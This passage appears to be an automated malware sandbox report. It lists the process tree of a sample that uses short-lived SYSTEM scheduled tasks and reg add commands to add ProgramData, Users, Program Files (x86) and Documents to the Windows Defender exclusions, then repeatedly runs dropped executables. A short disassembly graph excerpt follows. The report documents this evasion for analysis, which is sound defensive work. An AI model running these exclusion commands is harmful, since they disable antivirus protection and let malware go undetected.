                                                                            Imagebase:0x7ff7cc010000
                                                                            File size:289'792 bytes
                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:high
                                                                            Has exited:true

                                                                            General

                                                                            Target ID:7
                                                                            Start time:03:03:00
                                                                            Start date:15/01/2025
                                                                            Path:C:\Windows\System32\conhost.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                            Imagebase:0x7ff7699e0000
                                                                            File size:862'208 bytes
                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:high
                                                                            Has exited:true

                                                                            General

                                                                            Target ID:8
                                                                            Start time:03:03:00
                                                                            Start date:15/01/2025
                                                                            Path:C:\Windows\System32\schtasks.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f"
                                                                            Imagebase:0x7ff76f990000
                                                                            File size:235'008 bytes
                                                                            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:high
                                                                            Has exited:true

                                                                            General

                                                                            Target ID:9
                                                                            Start time:03:03:00
                                                                            Start date:15/01/2025
                                                                            Path:C:\Windows\System32\schtasks.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:SCHTASKS /Run /TN "Task1"
                                                                            Imagebase:0x7ff76f990000
                                                                            File size:235'008 bytes
                                                                            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:high
                                                                            Has exited:true

                                                                            General

                                                                            Target ID:10
                                                                            Start time:03:03:00
                                                                            Start date:15/01/2025
                                                                            Path:C:\Windows\System32\cmd.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /f
                                                                            Imagebase:0x7ff7cc010000
                                                                            File size:289'792 bytes
                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:high
                                                                            Has exited:true

                                                                            General

                                                                            Target ID:11
                                                                            Start time:03:03:00
                                                                            Start date:15/01/2025
                                                                            Path:C:\Windows\System32\conhost.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                            Imagebase:0x7ff7699e0000
                                                                            File size:862'208 bytes
                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:high
                                                                            Has exited:true

                                                                            General

                                                                            Target ID:12
                                                                            Start time:03:03:00
                                                                            Start date:15/01/2025
                                                                            Path:C:\Windows\System32\schtasks.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:SCHTASKS /Delete /TN "Task1" /F
                                                                            Imagebase:0x7ff76f990000
                                                                            File size:235'008 bytes
                                                                            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:high
                                                                            Has exited:true

                                                                            General

                                                                            Target ID:13
                                                                            Start time:03:03:00
                                                                            Start date:15/01/2025
                                                                            Path:C:\Windows\System32\reg.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /f
                                                                            Imagebase:0x7ff7b4230000
                                                                            File size:77'312 bytes
                                                                            MD5 hash:227F63E1D9008B36BDBCC4B397780BE4
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Has exited:true

                                                                            General

                                                                            Target ID:14
                                                                            Start time:03:03:01
                                                                            Start date:15/01/2025
                                                                            Path:C:\Windows\System32\cmd.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:"C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
                                                                            Imagebase:0x7ff7cc010000
                                                                            File size:289'792 bytes
                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Has exited:true

                                                                            General

                                                                            Target ID:15
                                                                            Start time:03:03:01
                                                                            Start date:15/01/2025
                                                                            Path:C:\Windows\System32\conhost.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                            Imagebase:0x7ff7699e0000
                                                                            File size:862'208 bytes
                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Has exited:true

                                                                            General

                                                                            Target ID:16
                                                                            Start time:03:03:01
                                                                            Start date:15/01/2025
                                                                            Path:C:\Windows\System32\schtasks.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\" /t REG_DWORD /d 0 /f"
                                                                            Imagebase:0x7ff76f990000
                                                                            File size:235'008 bytes
                                                                            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Has exited:true

                                                                            General

                                                                            Target ID:17
                                                                            Start time:03:03:01
                                                                            Start date:15/01/2025
                                                                            Path:C:\Windows\System32\schtasks.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:SCHTASKS /Run /TN "Task1"
                                                                            Imagebase:0x7ff76f990000
                                                                            File size:235'008 bytes
                                                                            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Has exited:true

                                                                            General

                                                                            Target ID:18
                                                                            Start time:03:03:01
                                                                            Start date:15/01/2025
                                                                            Path:C:\Windows\System32\cmd.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users" /t REG_DWORD /d 0 /f
                                                                            Imagebase:0x7ff7cc010000
                                                                            File size:289'792 bytes
                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Has exited:true

                                                                            General

                                                                            Target ID:19
                                                                            Start time:03:03:01
                                                                            Start date:15/01/2025
                                                                            Path:C:\Windows\System32\conhost.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                            Imagebase:0x7ff7699e0000
                                                                            File size:862'208 bytes
                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Has exited:true

                                                                            General

                                                                            Target ID:20
                                                                            Start time:03:03:01
                                                                            Start date:15/01/2025
                                                                            Path:C:\Windows\System32\schtasks.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:SCHTASKS /Delete /TN "Task1" /F
                                                                            Imagebase:0x7ff76f990000
                                                                            File size:235'008 bytes
                                                                            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Has exited:true

                                                                            General

                                                                            Target ID:21
                                                                            Start time:03:03:02
                                                                            Start date:15/01/2025
                                                                            Path:C:\Windows\System32\reg.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users" /t REG_DWORD /d 0 /f
                                                                            Imagebase:0x7ff7b4230000
                                                                            File size:77'312 bytes
                                                                            MD5 hash:227F63E1D9008B36BDBCC4B397780BE4
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Has exited:true

                                                                            General

                                                                            Target ID:22
                                                                            Start time:03:03:02
                                                                            Start date:15/01/2025
                                                                            Path:C:\Windows\System32\cmd.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:"C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
                                                                            Imagebase:0x7ff7cc010000
                                                                            File size:289'792 bytes
                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Has exited:true

                                                                            General

                                                                            Target ID:23
                                                                            Start time:03:03:02
                                                                            Start date:15/01/2025
                                                                            Path:C:\Windows\System32\conhost.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                            Imagebase:0x7ff7699e0000
                                                                            File size:862'208 bytes
                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Has exited:true

                                                                            General

                                                                            Target ID:24
                                                                            Start time:03:03:02
                                                                            Start date:15/01/2025
                                                                            Path:C:\Windows\System32\schtasks.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\" /t REG_DWORD /d 0 /f"
                                                                            Imagebase:0x7ff76f990000
                                                                            File size:235'008 bytes
                                                                            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Has exited:true

                                                                            General

                                                                            Target ID:25
                                                                            Start time:03:03:02
                                                                            Start date:15/01/2025
                                                                            Path:C:\Windows\System32\schtasks.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:SCHTASKS /Run /TN "Task1"
                                                                            Imagebase:0x7ff76f990000
                                                                            File size:235'008 bytes
                                                                            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Has exited:true

                                                                            General

                                                                            Target ID:26
                                                                            Start time:03:03:02
                                                                            Start date:15/01/2025
                                                                            Path:C:\Windows\System32\cmd.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Program Files (x86)" /t REG_DWORD /d 0 /f
                                                                            Imagebase:0x7ff7cc010000
                                                                            File size:289'792 bytes
                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Has exited:true

                                                                            General

                                                                            Target ID:27
                                                                            Start time:03:03:02
                                                                            Start date:15/01/2025
                                                                            Path:C:\Windows\System32\schtasks.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:SCHTASKS /Delete /TN "Task1" /F
                                                                            Imagebase:0x7ff76f990000
                                                                            File size:235'008 bytes
                                                                            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Has exited:true

                                                                            General

                                                                            Target ID:28
                                                                            Start time:03:03:02
                                                                            Start date:15/01/2025
                                                                            Path:C:\Windows\System32\conhost.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                            Imagebase:0x7ff7699e0000
                                                                            File size:862'208 bytes
                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Has exited:true

                                                                            General

                                                                            Target ID:29
                                                                            Start time:03:03:03
                                                                            Start date:15/01/2025
                                                                            Path:C:\Windows\System32\reg.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Program Files (x86)" /t REG_DWORD /d 0 /f
                                                                            Imagebase:0x7ff7b4230000
                                                                            File size:77'312 bytes
                                                                            MD5 hash:227F63E1D9008B36BDBCC4B397780BE4
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Has exited:true

                                                                            General

                                                                            Target ID:30
                                                                            Start time:03:03:03
                                                                            Start date:15/01/2025
                                                                            Path:C:\Windows\System32\cmd.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:"C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"%USERPROFILE%\Documents\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
                                                                            Imagebase:0x7ff7cc010000
                                                                            File size:289'792 bytes
                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Has exited:true

                                                                            General

                                                                            Target ID:31
                                                                            Start time:03:03:03
                                                                            Start date:15/01/2025
                                                                            Path:C:\Windows\System32\conhost.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                            Imagebase:0x7ff7699e0000
                                                                            File size:862'208 bytes
                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Has exited:true

                                                                            General

                                                                            Target ID:32
                                                                            Start time:03:03:03
                                                                            Start date:15/01/2025
                                                                            Path:C:\Windows\System32\schtasks.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\user\Documents\" /t REG_DWORD /d 0 /f"
                                                                            Imagebase:0x7ff76f990000
                                                                            File size:235'008 bytes
                                                                            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Has exited:true

                                                                            General

                                                                            Target ID:33
                                                                            Start time:03:03:03
                                                                            Start date:15/01/2025
                                                                            Path:C:\Windows\System32\schtasks.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:SCHTASKS /Run /TN "Task1"
                                                                            Imagebase:0x7ff76f990000
                                                                            File size:235'008 bytes
                                                                            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Has exited:true

                                                                            General

                                                                            Target ID:34
                                                                            Start time:03:03:03
                                                                            Start date:15/01/2025
                                                                            Path:C:\Windows\System32\cmd.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\user\Documents" /t REG_DWORD /d 0 /f
                                                                            Imagebase:0x7ff7cc010000
                                                                            File size:289'792 bytes
                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Has exited:true

                                                                            General

                                                                            Target ID:35
                                                                            Start time:03:03:03
                                                                            Start date:15/01/2025
                                                                            Path:C:\Windows\System32\conhost.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                            Imagebase:0x7ff7699e0000
                                                                            File size:862'208 bytes
                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Has exited:true

                                                                            General

                                                                            Target ID:36
                                                                            Start time:03:03:03
                                                                            Start date:15/01/2025
                                                                            Path:C:\Windows\System32\schtasks.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:SCHTASKS /Delete /TN "Task1" /F
                                                                            Imagebase:0x7ff76f990000
                                                                            File size:235'008 bytes
                                                                            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Has exited:true

                                                                            General

                                                                            Target ID:37
                                                                            Start time:03:03:03
                                                                            Start date:15/01/2025
                                                                            Path:C:\Windows\System32\reg.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\user\Documents" /t REG_DWORD /d 0 /f
                                                                            Imagebase:0x7ff7b4230000
                                                                            File size:77'312 bytes
                                                                            MD5 hash:227F63E1D9008B36BDBCC4B397780BE4
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Has exited:true

                                                                            General

                                                                            Target ID:39
                                                                            Start time:03:03:38
                                                                            Start date:15/01/2025
                                                                            Path:C:\Program Files (x86)\NEiV2V\NEiV2V.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:"C:\Program Files (x86)\NEiV2V\NEiV2V.exe"
                                                                            Imagebase:0x980000
                                                                            File size:54'152 bytes
                                                                            MD5 hash:7B6586E21FBC8F2F0BB784A1A8FC65B4
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Antivirus matches:
                                                                            • Detection: 0%, ReversingLabs
                                                                            Has exited:false

                                                                            General

                                                                            Target ID:40
                                                                            Start time:03:03:40
                                                                            Start date:15/01/2025
                                                                            Path:C:\Program Files (x86)\NEiV2V\NEiV2V.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:"C:\Program Files (x86)\NEiV2V\NEiV2V.exe"
                                                                            Imagebase:0x980000
                                                                            File size:54'152 bytes
                                                                            MD5 hash:7B6586E21FBC8F2F0BB784A1A8FC65B4
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Has exited:true

                                                                            General

                                                                            Target ID:41
                                                                            Start time:03:03:40
                                                                            Start date:15/01/2025
                                                                            Path:C:\Program Files (x86)\2I9luTPI\qH3CqQr.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:"C:\Program Files (x86)\2I9luTPI\qH3CqQr.exe"
                                                                            Imagebase:0xb50000
                                                                            File size:54'152 bytes
                                                                            MD5 hash:7B6586E21FBC8F2F0BB784A1A8FC65B4
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Antivirus matches:
                                                                            • Detection: 0%, ReversingLabs
                                                                            Has exited:true

                                                                            General

                                                                            Target ID:42
                                                                            Start time:03:03:41
                                                                            Start date:15/01/2025
                                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:cmd /c echo.>c:\xxxx.ini
                                                                            Imagebase:0x240000
                                                                            File size:236'544 bytes
                                                                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Has exited:true

                                                                            General

                                                                            Target ID:43
                                                                            Start time:03:03:41
                                                                            Start date:15/01/2025
                                                                            Path:C:\Windows\System32\conhost.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                            Imagebase:0x7ff7699e0000
                                                                            File size:862'208 bytes
                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Has exited:true

                                                                            General

                                                                            Target ID:44
                                                                            Start time:03:03:42
                                                                            Start date:15/01/2025
                                                                            Path:C:\Program Files (x86)\NEiV2V\NEiV2V.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:"C:\Program Files (x86)\NEiV2V\NEiV2V.exe"
                                                                            Imagebase:0x980000
                                                                            File size:54'152 bytes
                                                                            MD5 hash:7B6586E21FBC8F2F0BB784A1A8FC65B4
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Has exited:true

                                                                            General

                                                                            Target ID:45
                                                                            Start time:03:03:42
                                                                            Start date:15/01/2025
                                                                            Path:C:\Program Files (x86)\2I9luTPI\qH3CqQr.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:"C:\Program Files (x86)\2I9luTPI\qH3CqQr.exe"
                                                                            Imagebase:0xb50000
                                                                            File size:54'152 bytes
                                                                            MD5 hash:7B6586E21FBC8F2F0BB784A1A8FC65B4
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Has exited:true

                                                                            General

                                                                            Target ID:46
                                                                            Start time:03:04:01
                                                                            Start date:15/01/2025
                                                                            Path:C:\Program Files (x86)\NEiV2V\NEiV2V.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:"C:\Program Files (x86)\NEiV2V\NEiV2V.exe"
                                                                            Imagebase:0x980000
                                                                            File size:54'152 bytes
                                                                            MD5 hash:7B6586E21FBC8F2F0BB784A1A8FC65B4
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Has exited:true

                                                                            General

                                                                            Target ID:47
                                                                            Start time:03:04:01
                                                                            Start date:15/01/2025
                                                                            Path:C:\Program Files (x86)\2I9luTPI\qH3CqQr.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:"C:\Program Files (x86)\2I9luTPI\qH3CqQr.exe"
                                                                            Imagebase:0xb50000
                                                                            File size:54'152 bytes
                                                                            MD5 hash:7B6586E21FBC8F2F0BB784A1A8FC65B4
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Has exited:true

                                                                            General

                                                                            Target ID:48
                                                                            Start time:03:05:00
                                                                            Start date:15/01/2025
                                                                            Path:C:\Program Files (x86)\NEiV2V\NEiV2V.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:"C:\Program Files (x86)\NEiV2V\NEiV2V.exe"
                                                                            Imagebase:0x980000
                                                                            File size:54'152 bytes
                                                                            MD5 hash:7B6586E21FBC8F2F0BB784A1A8FC65B4
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Has exited:true

                                                                            General

                                                                            Target ID:49
                                                                            Start time:03:05:00
                                                                            Start date:15/01/2025
                                                                            Path:C:\Program Files (x86)\2I9luTPI\qH3CqQr.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:"C:\Program Files (x86)\2I9luTPI\qH3CqQr.exe"
                                                                            Imagebase:0xb50000
                                                                            File size:54'152 bytes
                                                                            MD5 hash:7B6586E21FBC8F2F0BB784A1A8FC65B4
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Has exited:true

                                                                            General

                                                                            Target ID:50
                                                                            Start time:03:06:00
                                                                            Start date:15/01/2025
                                                                            Path:C:\Program Files (x86)\NEiV2V\NEiV2V.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:"C:\Program Files (x86)\NEiV2V\NEiV2V.exe"
                                                                            Imagebase:0x980000
                                                                            File size:54'152 bytes
                                                                            MD5 hash:7B6586E21FBC8F2F0BB784A1A8FC65B4
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Has exited:true

                                                                            General

                                                                            Target ID:51
                                                                            Start time:03:06:00
                                                                            Start date:15/01/2025
                                                                            Path:C:\Program Files (x86)\2I9luTPI\qH3CqQr.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:"C:\Program Files (x86)\2I9luTPI\qH3CqQr.exe"
                                                                            Imagebase:0xb50000
                                                                            File size:54'152 bytes
                                                                            MD5 hash:7B6586E21FBC8F2F0BB784A1A8FC65B4
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Has exited:true

                                                                            Disassembly

                                                                            Reset < >

                                                                              Execution Graph

                                                                              Execution Coverage:2.1%
                                                                              Dynamic/Decrypted Code Coverage:0%
                                                                              Signature Coverage:32%
                                                                              Total number of Nodes:462
                                                                              Total number of Limit Nodes:7
                                                                              execution_graph 13935 140005df3 13936 140005e71 13935->13936 13937 140005e84 CreateFileA 13936->13937 13938 140005f50 __CxxFrameHandler 13937->13938 13939 140005fc3 malloc ReadFile 13938->13939 16523 7ffe1a5211b0 16527 7ffe1a521209 16523->16527 16524 7ffe1a521b90 51 API calls 16541 7ffe1a521300 _invalid_parameter_noinfo_noreturn 16524->16541 16525 7ffe1a5214f0 16556 7ffe1a521a40 16525->16556 16526 7ffe1a521b70 _log10_special 8 API calls 16531 7ffe1a5214d3 16526->16531 16527->16525 16529 7ffe1a52129e 16527->16529 16530 7ffe1a5212c7 16527->16530 16534 7ffe1a5212b9 BuildCatchObjectHelperInternal 16527->16534 16527->16541 16532 7ffe1a5214f6 16529->16532 16542 7ffe1a521b90 16529->16542 16533 7ffe1a521b90 51 API calls 16530->16533 16559 7ffe1a521110 16532->16559 16533->16534 16534->16524 16539 7ffe1a5214eb 16551 7ffe1a5279cc 16539->16551 16541->16526 16543 7ffe1a521b9b 16542->16543 16544 7ffe1a5212b0 16543->16544 16545 7ffe1a527a4c BuildCatchObjectHelperInternal 2 API calls 16543->16545 16546 7ffe1a521bba 16543->16546 16544->16534 16544->16539 16545->16543 16547 7ffe1a521bc5 16546->16547 16565 7ffe1a5221f0 16546->16565 16549 7ffe1a521110 Concurrency::cancel_current_task 51 API calls 16547->16549 16550 7ffe1a521bcb 16549->16550 16552 7ffe1a527844 _invalid_parameter_noinfo 47 API calls 16551->16552 16553 7ffe1a5279e5 16552->16553 16554 7ffe1a5279fc _invalid_parameter_noinfo_noreturn 17 API calls 16553->16554 16555 7ffe1a5279fa 16554->16555 16569 7ffe1a521b34 16556->16569 16560 7ffe1a52111e Concurrency::cancel_current_task 16559->16560 16561 7ffe1a523990 Concurrency::cancel_current_task 2 API calls 16560->16561 16562 7ffe1a52112f 16561->16562 16563 7ffe1a52379c __std_exception_copy 49 API calls 16562->16563 16564 7ffe1a521159 16563->16564 16566 7ffe1a5221fe Concurrency::cancel_current_task 16565->16566 16567 7ffe1a523990 Concurrency::cancel_current_task 2 API calls 16566->16567 16568 7ffe1a52220f 16567->16568 16574 7ffe1a521ab0 16569->16574 16572 7ffe1a523990 Concurrency::cancel_current_task 2 API calls 16573 7ffe1a521b56 16572->16573 16575 7ffe1a52379c __std_exception_copy 49 API calls 16574->16575 16576 7ffe1a521ae4 16575->16576 16576->16572 15140 140007412 15142 140007333 15140->15142 15141 140007403 15142->15141 15143 1400073e0 LdrLoadDll 15142->15143 15143->15142 15489 140013670 